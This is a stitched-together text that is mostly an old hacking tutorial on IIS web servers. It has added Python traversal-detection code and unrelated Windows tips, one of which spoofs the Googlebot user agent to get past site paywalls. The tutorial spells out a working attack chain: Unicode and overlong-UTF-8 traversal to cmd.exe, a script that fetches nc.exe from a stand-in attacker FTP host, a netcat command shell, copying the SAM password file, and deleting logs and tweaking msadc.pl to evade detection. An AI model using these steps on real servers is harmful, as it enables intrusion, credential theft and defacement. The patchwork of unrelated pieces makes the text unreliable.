.           2E       C0 AE    E0 80 AE
/           2F       C0 AF    E0 80 AF
\           5C       C1 9C    E0 81 9C

This led to a new vulnerability in certain webservers. The parser didn't understand this new encoding and allowed it through :-)

For example:

www.target.com/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd

Recent vulnerabilities have been taking advantage of the fact that the web server doesn't understand the Unicode UTF-8 character set but the underlying OS does:

www.target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir

Understanding the distinction between Unicode and UTF-8 can be difficult. As a general rule of thumb you can use the following format as a guide:

%uxxxx  = Unicode
%xx%xx  = UTF-8
%xx     = Hexadecimal
%xxxx   = Double Decode
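As an added example (not from fugjostle's guide), the following Python canonicaliser folds every encoding described in the three sections above (plain, hex, double decode, %u and overlong UTF-8) into one form before a single traversal rule is applied, and runs that rule over constructed log lines built from the URLs on this page.

```python
"""Canonicalise a request path before judging it, so that '../', '%2e%2e',
double-decoded '%252e', '%u002e' and overlong UTF-8 '%c0%ae' all collapse to
the same form; then run the traversal check over sample log lines."""
import re
from typing import List
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 sequences from the table above and the bytes they stand for.
OVERLONG = {
    b"\xc0\xae": b".", b"\xe0\x80\xae": b".",
    b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/",
    b"\xc1\x9c": b"\\", b"\xe0\x81\x9c": b"\\",
}


def _fold_u_escape(m: "re.Match[bytes]") -> bytes:
    """%uXXXX with a code point below 0x100 becomes a plain %XX escape."""
    cp = int(m.group(1), 16)
    return b"%%%02X" % cp if cp < 0x100 else m.group(0)


def canonicalise(path: str, max_decodes: int = 3) -> str:
    """Drop the query, apply %u and %XX decoding repeatedly (this is what
    defeats the 'double decode'), fold overlong UTF-8, turn backslashes
    into slashes and collapse repeated slashes."""
    raw = path.split("?", 1)[0].encode("latin-1", "replace")
    raw = re.sub(rb"%[uU]([0-9a-fA-F]{4})", _fold_u_escape, raw)
    for _ in range(max_decodes):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for seq, plain in OVERLONG.items():
        raw = raw.replace(seq, plain)
    text = raw.decode("latin-1").replace("\\", "/")
    return re.sub(r"/+", "/", text)


def escapes_root(path: str) -> bool:
    """True if the canonical path climbs above the document root. Any segment
    made only of two or more dots counts as a parent reference, a deliberately
    conservative rule that also catches the '....//' form shown above."""
    depth = 0
    for seg in canonicalise(path).split("/"):
        if seg in ("", "."):
            continue
        if len(seg) >= 2 and seg.strip(".") == "":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')


def flag_traversal(log_lines: List[str]) -> List[str]:
    """Return the canonical form of every logged request that escapes the root."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and escapes_root(m.group(1)):
            hits.append(canonicalise(m.group(1)))
    return hits


# Constructed common-log-format lines using the example URLs from this guide.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2001:10:00:00 +0000] "GET /stuff/my%20index.html HTTP/1.0" 200 512',
    '10.0.0.5 - - [01/Jan/2001:10:00:01 +0000] "GET /%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 404 0',
    '10.0.0.5 - - [01/Jan/2001:10:00:02 +0000] "GET /..%252f..%252fdocs/ HTTP/1.0" 403 0',
    '10.0.0.5 - - [01/Jan/2001:10:00:03 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 200 0',
    '10.0.0.5 - - [01/Jan/2001:10:00:04 +0000] "GET /images/../pictures.html HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for hit in flag_traversal(SAMPLE_LOG):
        print("traversal:", hit)
```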

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that increase the functionality of the web server. These ISAPI (Internet Server API) applications allow programmers/developers to deliver more functionality to IIS.

The DLL's are loaded into memory at startup and offer significant speed over traditional CGI programs. For example, they can be combined with the Internet Database Connector (httpodbc.dll) to create interactive sites that use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active Server Pages) are basically HTML pages with embedded code that is processed by the webserver before serving it to the client.

Here are some examples to illustrate how the sample pages installed by default can aid someone breaking into your site via the ASP.DLL: [prefix all the examples with http://www.target.com]

/default.asp.

** Appending a '.' to the URL can reveal the source
** on older systems. Remember hex encoding? You can
** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into the msadcs.dll
** and allows creation of DSN's. Read RFP's stuff
** for ideas on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini
/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the
** document root. '/msadc/' needs to be in the
** request as it is checked for, wait for this,
** security :-)

/index.asp::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the ASP.

/index.asp%81

** Append a hex value between 0x81 and 0xfe
** and you can reveal the source of any server
** processed file. This only works on servers
** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote
** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used to administer IIS3 servers. In IIS4 they are not used but various .htr samples are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,
** which will strip the '.htr' extension and
** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit
** above. ISM.DLL strips the +.htr and delivers
** you the source of the file.

/scripts/iisadmin/ism.dll?http/dir

** Excellent brute force opportunity if the
** dll exists. Successful logons will reveal
** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd directory contains several .htr
** files that allow NetBIOS resolution and
** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories
** but can be useful for identifying the
** server's structure for more advanced
** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS (Remote Data Service). RDS is part of the default install of Microsoft Data Access Components (MDAC) and is commonly exploited on IIS. It can allow arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty
** good chance that you can run the RDS
** exploit against the box. More on this later.

HTTPODBC.DLL is the Internet Database Connector (IDC) and is used when the web server wants to connect to a database. It allows the creation of web pages from data in the database, and it allows you to update/delete items from within webpages. Pages with the extension '.idc' are sent to the HTTPODBC.DLL for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the IDC.

/anything.idc

** Requesting a non-existent file will
** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it
** receives. Excellent place to look at for
** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). Files with the '.stm', '.shtm' and '.shtml' extensions are sent to the DLL, which interprets the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

<!--#include file="news.txt"-->

This SSI tells the server to include 'news.txt' in the final HTML sent to the user. SSI statements are beyond the scope of this document but offer another security hole open to our wily hax0r. Ensure you remove the app mapping and disable SSI if you do not require its functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow; read the following advisory for details:

http://www.nsfocus.com/english/homepage/sa01-06.htm

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist
** then the server error message contains
** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view
** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq' requests. This DLL has had some big exposure with the recent Nimda worm. I'm not going into too much detail but '.ida' was used in a buffer overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existent file will
** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on
** the same drive as the web root.

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your IIS server, via a web browser or the Web Publishing Wizard. The existence of this DLL can allow attackers to upload files to the server. Other files such as uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able
** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice
** gui for uploading your own webpages. You
** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few of them are very, very insecure. Microsoft recommends that you remove ALL samples from any production server including the ExAir, WSH, ADO and other installed samples.

IIS Default Web Site
--------------------
IISSAMPLES  - c:\inetpub\iissamples
IISADMIN    - c:\winnt\system32\inetsrv\issadmin
IISHELP     - c:\winnt\help
SCRIPTS     - c:\inetpub\scripts
IISADMPWD   - c:\winnt\system32\inetsrv\iisadmpwd
msadc       - c:\program files\common files\system\msadc
logfiles    - c:\winnt\system32\logfiles
default.htm - c:\inetpub\wwwroot

IIS Default App Mapping
-----------------------
.asa   - c:\winnt\system32\inetsrv\asp.dll
.asp   - c:\winnt\system32\inetsrv\asp.dll
.cdx   - c:\winnt\system32\inetsrv\asp.dll
.cer   - c:\winnt\system32\inetsrv\asp.dll
.htr   - c:\winnt\system32\inetsrv\ism.dll
.idc   - c:\winnt\system32\inetsrv\httpodbc.dll
.shtm  - c:\winnt\system32\inetsrv\ssinc.dll
.shtml - c:\winnt\system32\inetsrv\ssinc.dll
.stm   - c:\winnt\system32\inetsrv\ssinc.dll

--[On the fifth day, God created Frontpage Extensions]--

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've ever wondered why they use _vti_) is a web design tool that helps you create and maintain a web site and allows you to publish it to the web server.

In order to publish using Frontpage the server needs to run certain programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in Frontpage. You can list all the files, download password files and upload your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to get all the information it needs to publish:

http://www.myserver.com/_vti_inf.html

Then Frontpage uses the following URL to POST the files to the site:

http://www.myserver.com/_vti_bin/shtml.exe/_vti_rpc

It will come as no surprise that this file is not protected and open to abuse.

All information for the site is stored in the /_vti_pvt/ dir, and it's world readable. Here's some of the things you can look for:

http://www.myserver.com/_vti_pvt/administrators.pwd
http://www.myserver.com/_vti_pvt/authors.pwd
http://www.myserver.com/_vti_pvt/service.pwd
http://www.myserver.com/_vti_pvt/shtml.dll
http://www.myserver.com/_vti_pvt/shtml.exe
http://www.myserver.com/_vti_pvt/users.pwd
http://www.myserver.com/_private

--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external applications to the web server. A CGI program is executed in real time and is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed anywhere. The programs can be written in most languages but typically they are written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like Matt's Trojan, erm, I mean Matt's Script Archive. It's always a good idea to look through the source of the scripts for bad system calls and lax input validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read the following tutorials... they explain it better than I ever could:

Hacking CGI - http://shells.cyberarmy.com/~johnr/docs/cgi/cgi.txt

Perl CGI Problems - http://www.phrack.com/phrack/55/P55-07

Just to get you in the mood we will have a brief look at CGI exploitation. There are three main types of CGI hacking: URL encoding attacks, input validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi using the techniques from previous sections. First, we need to cover some background. CGI can take lots of shapes and forms. One popular use is via web based forms that submit information to a CGI via a GET or POST.

<FORM NAME="myform" METHOD="GET" ACTION="../cgi-bin/my_cgi.cgi">

When the user clicks on the submit button his information is passed to the CGI script to process either via the URL (GET) or via the HTTP request body (POST).

Let's assume that the CGI we are going to exploit asks the user for the name of a file to display. The 'GET' method uses the URL to pass the information and it would look like this:

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd

Let's break that down:

?           - separates the request from the parameters
filename    - this is the name of the textbox in the html
=           - assignment for the parameter/value pair
/etc/passwd - this is what the user typed into the box

You can have multiple fields within an HTML form and these will also be passed to the CGI. They are separated using a '&':

http://www.target.com/cgi-bin/my_cgi.cgi?filename=/etc/passwd&user=fugjostle

If you were thinking how you could alter the user-supplied input to break the CGI then good, you're starting to think in terms of security. Lots of developers love to program new and interesting things but they do not consider security. A security-conscious programmer would write input validation routines that would process the data and ensure the user wasn't being malicious or curious.

As you read through some of the free scripts on the web you will start to realise that many programmers do not think about security. Let's look briefly at some ways we could exploit the CGI. The first thing to keep in mind is that you already know the generic exploits from the previous section. The only area in which we are lacking is programming language specific info.

We will stick with the example CGI that opens a file (and let's assume it's written in Perl). Let's look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and lets do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with poison null bytes. Stop now and go read it... can't be arsed? ok then, here's the quick version. %00 is valid in a string with Perl but is NUL in C. So? When Perl wants to open the file it makes a request to the operating system through a system call. The operating system is written in C and %00 is a string delimiter. Let's apply this technique to the following situation.

I decide to secure my CGI. I append '.html' to any request. This means that the user can only view html files and if they try something else then it doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is passed to the OS (which is written in C not Perl) the request looks like this:

"../../../../etc/passwd"

The OS treats the NUL (%00) as the string delimiter and ignores anything that comes after it. The webserver then displays the /etc/passwd file... bugger :-(
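As an added example for the defender's side (not part of the original tutorial and not its CGI), here is how the 'filename' parameter above could be handled so that the traversal, the %c0%af encoding and the poison null byte are all rejected before anything is opened; the web root path and the function names are assumptions.

```python
import os
from urllib.parse import unquote_to_bytes

# Added example (not the tutorial's own CGI): a defensive version of the
# "filename" parameter handling discussed above. The vulnerable pattern
# appended ".html" to the raw parameter and opened the result; this version
# decodes once, rejects NUL bytes (the poison null byte), rejects anything
# that is not strict UTF-8 (which covers overlong forms such as %c0%af) and
# checks that the resolved path is still inside the web root.

WEB_ROOT = "/var/www/html"  # assumed web root, not taken from the text


class BadRequest(Exception):
    """Raised for any parameter value that must not reach the filesystem."""


def decode_param(raw):
    """Percent-decode a query parameter once and validate it as text."""
    data = unquote_to_bytes(raw)
    if b"\x00" in data:
        # Perl and Python strings may hold NUL, but the C-level open()
        # stops there, so a ".html" appended later would be dropped.
        raise BadRequest("NUL byte in parameter")
    try:
        text = data.decode("utf-8")  # strict: overlong %c0%af is an error
    except UnicodeDecodeError:
        raise BadRequest("parameter is not valid UTF-8")
    if "%" in text:
        # a second encoding layer (%2500, %252e) is a sign of probing
        raise BadRequest("double-encoded parameter")
    return text


def resolve_html_path(filename, web_root=WEB_ROOT):
    """Map a decoded filename to an .html file under web_root.

    Raises BadRequest if the request would escape the web root or asks
    for something other than an .html document under it.
    """
    if not filename:
        raise BadRequest("empty filename")
    if filename.startswith(("/", "\\")) or "\\" in filename:
        raise BadRequest("absolute path or backslash in filename")
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, filename + ".html"))
    # realpath() collapses the ../ segments, so containment is checked on
    # the final path rather than by searching the raw string for "..".
    if os.path.commonpath([root, candidate]) != root:
        raise BadRequest("path escapes web root")
    return candidate


def handle_filename_param(raw, web_root=WEB_ROOT):
    """Run both checks; returns ("ok", path) or ("rejected", reason)."""
    try:
        path = resolve_html_path(decode_param(raw), web_root)
    except BadRequest as exc:
        return ("rejected", str(exc))
    return ("ok", path)


if __name__ == "__main__":
    for probe in ("index", "../../../../etc/passwd%00",
                  "../..%c0%af../..%c0%af../etc/passwd",
                  "../../../../../etc/passwd"):
        print(probe, "->", handle_filename_param(probe))
```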

Many people download scripts from the web and look for problems in the script. Then the wily hax0r will go to AltaVista and search for sites that are using that script, eg:

url:pollit.cgi

and good old AltaVista provides a list of sites that are just ripe for the taking.

The final method of exploiting CGI is via buffer overflows. Languages like Java and Perl are immune to buffer overflows because the language looks after memory management. Programs written in a language such as C are vulnerable because the programmer is supposed to manage the memory. Some programmers fail to check the size of the data they are fitting into the memory buffer, and the excess overwrites data on the stack.

The goal of the buffer overflow is to overwrite the instruction pointer, which points to the location of the next bit of code to run. An attacker will attempt to overwrite this pointer with a new pointer that points to the attacker's code, usually a root shell.

Quite a few CGIs exist that are vulnerable to this type of attack. For example, counter.exe is one such CGI. Writing 2000 A's to the CGI causes a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document. Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

http://www.phrack.com/phrack/49/P49-14

--[On the seventh day, God chilled and haxored the planet]

Well.. I guess it's time we actually tried some of the things discussed, but I'm not going to cover everything. I suggest going to the following URLs and searching for IIS:

http://www.securityfocus.com/
http://www.packetstormsecurity.com/

My main reason for doing this file was to better understand Unicode exploits and so that is going to be the focus of the exploitation. The first exploit I'm going to go through is the recent Unicode exploit for IIS4/5:

http://www.securityfocus.com/bid/1806

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me explain. This had wide exposure on Bugtraq as the Unicode exploit. In reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep calling this the Unicode exploit because its now referenced by this name in the Bugtraq archives and you'll have to search using Unicode to do further research.

Ok, rant over... To check if the server is exploitable, request the following URL:

http://target.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

You should get a directory listing of the C:\ drive on the target server. The important thing to note is that the Unicode string can vary depending on where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or research UTF-8 for more alternatives.
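As an added example for the defender's side (not part of the original text), the following Python decodes request paths the way the vulnerable server did, folding overlong UTF-8 such as %c0%af and %c1%9c back to '/' and '\' and undoing double percent-encoding, and flags the traversal that only appears after decoding. The W3C-style log lines and the function names are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed W3C-style log lines (date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status). They are made up for this example, not taken
# from a real server; the request shapes follow the tutorial above.
SAMPLE_LOG = """\
2001-10-20 10:15:01 10.0.0.5 GET /default.htm - 200
2001-10-20 10:15:07 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-10-20 10:15:09 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2001-10-20 10:15:12 10.0.0.9 GET /images/logo.gif - 200
2001-10-20 10:15:20 10.0.0.5 GET /msadc/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-10-20 10:15:31 10.0.0.9 GET /docs/r%C3%A9sum%C3%A9.htm - 200
"""

# Overlong UTF-8: a code point written with more bytes than its shortest
# form. A strict decoder rejects these; IIS 4/5 accepted them, which is
# why %c0%af ('/') and %c1%9c ('\') got past the traversal check.
OVERLONG = re.compile(
    rb"[\xc0\xc1][\x80-\xbf]"           # 2-byte form of U+0000..U+007F
    rb"|\xe0[\x80-\x9f][\x80-\xbf]"     # 3-byte form of U+0000..U+07FF
    rb"|\xf0[\x80-\x8f][\x80-\xbf]{2}"  # 4-byte form of U+0000..U+FFFF
)
TRAVERSAL = re.compile(r"\.\.[/\\]")


def _codepoint(seq):
    """Decode one (possibly overlong) UTF-8 sequence to its code point."""
    b0 = seq[0]
    cp = b0 & 0x1F if b0 < 0xE0 else b0 & 0x0F if b0 < 0xF0 else b0 & 0x07
    for b in seq[1:]:
        cp = (cp << 6) | (b & 0x3F)
    return cp


def fold_overlong(data):
    """Rewrite overlong sequences to their shortest encoding.

    Returns (folded_bytes, number_of_overlong_sequences_found).
    """
    count = 0

    def repl(match):
        nonlocal count
        count += 1
        return chr(_codepoint(match.group(0))).encode("utf-8", "surrogatepass")

    return OVERLONG.sub(repl, data), count


def normalise_uri(raw, rounds=2):
    """Percent-decode up to `rounds` times, folding overlong UTF-8 each time.

    Returns (text, overlong_count, rounds_needed); rounds_needed of 2 means
    the URI was double-encoded (e.g. %255c -> %5c -> backslash).
    """
    current = raw.encode("utf-8")
    overlong = needed = 0
    for _ in range(rounds):
        decoded, n = fold_overlong(unquote_to_bytes(current))
        overlong += n
        if decoded == current:
            break
        current = decoded
        needed += 1
    return current.decode("utf-8", errors="replace"), overlong, needed


def scan_line(line):
    """Return a finding for a suspicious request line, or None."""
    fields = line.split()
    if len(fields) < 7:
        return None
    client, stem, status = fields[2], fields[4], fields[6]
    text, overlong, needed = normalise_uri(stem)
    reasons = []
    if overlong:
        reasons.append("overlong UTF-8 sequences: %d" % overlong)
    if needed >= 2:
        reasons.append("double percent-encoding")
    if TRAVERSAL.search(text):
        reasons.append("directory traversal after decoding")
    if not reasons:
        return None
    return {"client": client, "raw": stem, "decoded": text,
            "status": status, "reasons": reasons}


def scan_log(text):
    """Scan every line of a log and return the list of findings."""
    return [f for f in map(scan_line, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["decoded"], "; ".join(finding["reasons"]))
```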

OK, you can read the directory... what next? You have the directory listing and the ability to run commands, so you need to find the web root. By default, the web root is at:

c:\inetpub\wwwroot\

If it's not there then go and look for it. Let's write a text file there and see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

hmmm.. it seems that we don't have write access. Ok, no problem, we can get around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\fug.exe

Let's check if it worked:

http://target.com/scripts/..%c0%af../winnt/system32/fug.exe?/c+dir+c:\

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\wwwroot\test.txt

Let's open it up in the browser and see if we can see it:

http://target.com/test.txt

w00t!!! Write access!!! Right, we now have some options open to us. In the words of Microsoft, where do you want to go today? Working via the URL is pretty clunky and I like the comfort of a nice command prompt, so let's do that. I want to bring over a copy of netcat and a nice html page that I'll use to replace the existing one.

First I need to think about the script I want to run that will get the files I need from my FTP server:

fugscript:
open ftp.evilhaxor.com
anonymous
anon@microsoft.com
cd pub
get nc.exe
get hacked.html
quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
fug.exe?/c+echo%20anonymous>>fugscript
fug.exe?/c+echo%20anon@microsoft.com>>fugscript
fug.exe?/c+echo%20cd%20pub>>fugscript
fug.exe?/c+echo%20get%20nc.exe>>fugscript
fug.exe?/c+echo%20get%20hacked.html>>fugscript
fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. The next step is to execute the script and get my files from my FTP server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files transferred. Be patient and give it time to transfer. Now you are ready to get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e) when someone connects. The last step is to translate this command into URL speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and voila... you have a cmd prompt. I really hate web defacements... so if you're going to do it then rename the existing index.htm (or default.htm) to something like index.htm.old (give the poor admin a break, cause you can bet your arse that he hasn't made a backup). ALSO: you are now using a system without authorisation and as such, you are guilty under the Computer Misuse Act in the UK and probably of something similar in your own country. If it never occurred to you to delete the contents of c:\winnt\system32\logfiles or the 'fugscript' file then you really shouldn't be doing this.

It just wouldn't be right to talk about IIS exploitation without mentioning msadc.pl. rfp's perl script is a perfect example of exploit chaining. A single exploit is not used but a chain of exploits to get the script to work.

The exploit utilises a combination of inadequate application input validation and default install fun. The process tries to connect to a Data Source Name (DSN) to execute commands.

rfp's script tests for the existence of /msadc/msadc.dll using the GET method. This test will be logged and you should edit the script to make it a HEAD request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME separator string. It is advised to change this string as some IDSs are configured to identify this string.

If you want to write your own scanners then you should be looking for headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail because this is heavily documented on rfp's site:

http://www.wiretrip.net/rfp/

How do I use it? I hear you cry... well, it's child's play:

./msadc2.pl -h www.target.com

If all goes well then you should be presented with the following:

command:

It's interesting to note at this point that 'cmd /c' is run, as with the previous exploit. You can edit the script to run any other executable such as 'rdisk /s' instead.

This is good, you can now enter the command you want to run on the server. The previous Unicode exploit should have given you some ideas but here's a couple that come to mind:

Example 1: copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\fug.hak

(grabbing fug.hak via your browser should give you a nice file to fire up in L0phtcrack or JTR)

Example 2: echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript && echo mypassword>>fugscript... etc. etc.

Anyway, that's about all for now. When I can be bothered I'll add some more methods to this file. Until then, ensure your box is fully patched and the default scripts are removed. Go have a look at the following URL and get secure:

http://www.microsoft.com/security/

Rename extension with .bat

You all downloaded some game or app once that was 50 parts big, and you had to rename them all from .bmp to .rar to extract them.

You can easily create a batch file that does that for you.

Open Notepad

fill in the notepad:

CODE

ren *.bmp *.rar

Of course, you have to edit these two extensions to fit the files you want to convert. Save this file as renamer.bat and run it in the directory where you want to rename your downloads.

Rename extension

How to Rename File Extensions

A lot of people here may ask how to rename a file extension in Windows; well, it's very simple and takes little of your time. There are two ways to rename a file extension 'without' a stupid program.

Number 1, Folder Options:

Go into your Control Panel; in my case I use Windows XP so I would press [Start then Control Panel]. Now that you figured out how to get in Control Panel, open "Folder Options", click the View tab and make sure 'Hide file extensions for known file types' is not selected, then press OK.

Now go into a folder and notice you can see your files extensions, rename them to whatever you'd like, for instance:

Code: Dildos.exe to Dildos.Anonymous / Etc,Etc,Etc

Number 2, MS-DOS:

The difference with renaming files in DOS is that you can rename multiple files rather than one at a time, therefore making time gracious. Here I'll provide you a few examples.

Go to your start menu and open Run, then type "cmd" without the quotes. Ok, you're in MS-DOS right? Geesh, common man, I know a 5 year old that can do it. Ok good, you're in? Excellent... Ok now find out which directory has your files and type:

Example

cd C:\Files\

In your case "C:\Files\" may not exist, so type in the directory that you have your files in. If everything goes well DOS will look kinda like this:

Code: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User>cd C:\Files\

If all fails, you perhaps didn't type in the correct folder/name and it will look like this:

Code: C:\Documents and Settings\User>cd C:\Filse\ The system cannot find the path specified.

Did you get in the directory yet????? If not I recommend you stick with the first step and hang yourself. Oh, you're in? OK COOL, type: dir and you will be provided with what files are in your folder, including their extensions. In my case:

Code:
C:\Files>dir
 Volume in drive C has no dildo.
 Volume Serial Number is CXXX-XXXX

 Directory of C:\Files

02/01/2005  07:22 PM    <DIR>          .
02/01/2005  07:22 PM    <DIR>          ..
01/31/2005  06:40 PM            14,336 stf.bmp
01/31/2005  06:40 PM            14,336 stf02.bmp
               2 File(s)         28,672 bytes
               2 Dir(s)  39,024,766,976 bytes free

C:\Files>

Did you notice how I had two files named stf? Since both of these files have the same extension, *.bmp, they can be renamed all together. If there are other files in there with the same extension and you don't want to rename them, move them to another folder and/or directory.

Last but not least, after listening to my horrific grammar, type:

Code: C:\Files>ren *.bmp *.rar

And your results are:

Code:
C:\Files>dir
 Volume in drive C has no penis.
 Volume Serial Number is CXXX-XXXX

 Directory of C:\Files

02/01/2005  07:37 PM    <DIR>          .
02/01/2005  07:37 PM    <DIR>          ..
01/31/2005  06:40 PM            14,336 stf.rar
01/31/2005  06:40 PM            14,336 stf02.rar
               2 File(s)         28,672 bytes
               2 Dir(s)  39,024,676,864 bytes free

C:\Files>

Restrict login hours allowed

To restrict a user's logon hours, use the net user command. These commands are used from the Command Prompt (Start - Run - and type cmd).


Below are some examples:

1 - net user Joanna /time:M-F,08:00-17:00

2 - net user Ninja /time:M-F,8am-5pm

3 - net user Echelon /time:M,4am-5pm;T,1pm-3pm;W-F,8:00-17:00

4 - net user Shine /time:all (this one means this user can always log on)

Note: You can only restrict when a user can log on to the system. On a stand-alone computer, there is no way to force a user to log off when their hours expire without a third-party script or software.

Secret backdoors in many sites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first.... The lesson you should have learned here is: obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh Notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"

Voila! You're done!

You may always change it back again.... I know only one site that uses your User Agent to establish your eligibility to use its services, and that's the Windows Update site... To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge it with your registry:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

